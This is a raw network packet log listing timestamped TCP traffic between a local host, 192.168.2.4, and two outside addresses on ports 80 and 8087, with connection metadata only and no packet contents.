Jul 3, 2024 14:50:56.162822008 CEST	80	49739	178.237.33.50	192.168.2.4
Jul 3, 2024 14:50:56.162909031 CEST	49739	80	192.168.2.4	178.237.33.50
Jul 3, 2024 14:50:56.163086891 CEST	49739	80	192.168.2.4	178.237.33.50
Jul 3, 2024 14:50:56.168320894 CEST	80	49739	178.237.33.50	192.168.2.4
Jul 3, 2024 14:50:56.700468063 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.700500011 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.700512886 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.700584888 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.700640917 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.700653076 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.700664997 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.700676918 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.700684071 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.700707912 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.700825930 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.700839043 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.700850010 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.700875998 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.700901985 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.705534935 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.705601931 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.705658913 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.770365000 CEST	80	49739	178.237.33.50	192.168.2.4
Jul 3, 2024 14:50:56.770447969 CEST	49739	80	192.168.2.4	178.237.33.50
Jul 3, 2024 14:50:56.784698009 CEST	49737	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.787683010 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.787704945 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.787722111 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.787760019 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.787831068 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.787842989 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.787874937 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.788146019 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.788156033 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.788192987 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.788243055 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.788254023 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.788265944 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.788295031 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.788330078 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.789211035 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.789222002 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.789233923 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.789263964 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.789349079 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.789369106 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.789391994 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.790581942 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.790628910 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.790631056 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.790642977 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.790697098 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.790749073 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.790760040 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.790791988 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.792432070 CEST	8087	49737	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.793868065 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.796819925 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.796865940 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.827790022 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.827821016 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.827878952 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.875650883 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.875685930 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.875718117 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.875729084 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.875730038 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.875766993 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.875838995 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.876121998 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.876133919 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.876168013 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.876171112 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.876179934 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.876205921 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.876576900 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.876588106 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.876599073 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.876641035 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.876641035 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.876684904 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.876698017 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.876725912 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.877360106 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.877418995 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.877429962 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.877456903 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.877521038 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.877532005 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.877558947 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.878253937 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.878293991 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.878303051 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.878319025 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.878353119 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.878607988 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.878618956 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.878655910 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.879312992 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.879410028 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.879420042 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.879456043 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.879470110 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.879481077 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.879512072 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.879877090 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.879894972 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.879915953 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.892039061 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.892059088 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.892070055 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.892097950 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.892121077 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.892209053 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.892220974 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.892230988 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.892244101 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.892251968 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.892292976 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.892505884 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.892524004 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.892638922 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.892642975 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.892651081 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.892663002 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.892700911 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.956149101 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.956171989 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.956182957 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.956264973 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.963121891 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.963172913 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.963176966 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.963184118 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.963242054 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.963331938 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.963345051 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.963392019 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.963395119 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.963407040 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.963453054 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.963521957 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.963583946 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.963594913 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.963625908 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.963713884 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.963726044 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.963737011 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.963757992 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.963794947 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.964184046 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.964286089 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.964298010 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.964339018 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.964371920 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.964503050 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.964534044 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.964637995 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.964648962 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.964698076 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.964726925 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.964739084 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.964750051 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.964761972 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.964767933 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.964804888 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.964921951 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.964932919 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.964962959 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.965620995 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.965666056 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.965688944 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.965702057 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.965745926 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.965836048 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.965847969 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.965859890 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.965871096 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.965888977 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.965910912 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.966191053 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.966274977 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.966289043 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.966319084 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.966387033 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.966398954 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.966409922 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.966475010 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.967766047 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.967895985 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.967907906 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.967942953 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.967951059 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.967966080 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.967987061 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.968054056 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.968065023 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.968075991 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.968127012 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.968127012 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.968138933 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.968501091 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.968544960 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.968571901 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.968583107 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.968622923 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.979782104 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.979813099 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.979825020 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.979856968 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.979928017 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.979939938 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.979979038 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.980053902 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.980066061 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.980093956 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.980144978 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.980156898 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.980168104 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.980180025 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.980192900 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.980233908 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.980300903 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.980350018 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.980400085 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.980412006 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.980448961 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.980479002 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.980496883 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.980536938 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.980716944 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.980729103 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.980772972 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.981049061 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.981066942 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.981080055 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.981091976 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.981102943 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.981112957 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.981118917 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:56.981125116 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:56.981151104 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.030760050 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.044047117 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.044060946 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.044071913 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.044150114 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.044166088 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.044177055 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.044214010 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.051070929 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.051083088 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.051094055 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.051124096 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.051156044 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.051158905 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.051170111 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.051189899 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.051255941 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.051345110 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.051356077 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.051367044 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.051378965 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.051414967 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.051414967 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.051585913 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.051597118 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.051606894 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.051618099 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.051628113 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.051640034 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.051641941 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.051641941 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.051670074 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.051827908 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.051878929 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.051891088 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.051906109 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.051970005 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.052000046 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.052011013 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.052057981 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.052081108 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.052167892 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.052179098 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.052220106 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.052310944 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.052321911 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.052334070 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.052357912 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.052438021 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.052540064 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.052551985 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.052562952 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.052635908 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.052709103 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.052721024 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.052731991 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.052743912 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.052755117 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.052763939 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.052769899 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.052782059 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.052791119 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.052812099 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.052839041 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.053024054 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.053035021 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.053045034 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.053091049 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.053468943 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.053508043 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.053522110 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.053546906 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.053564072 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.053669930 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.053682089 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.053692102 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.053703070 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.053730965 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.053754091 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.053914070 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.053925991 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.053936958 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.053951979 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.053963900 CEST	8087	49738	107.175.229.139	192.168.2.4
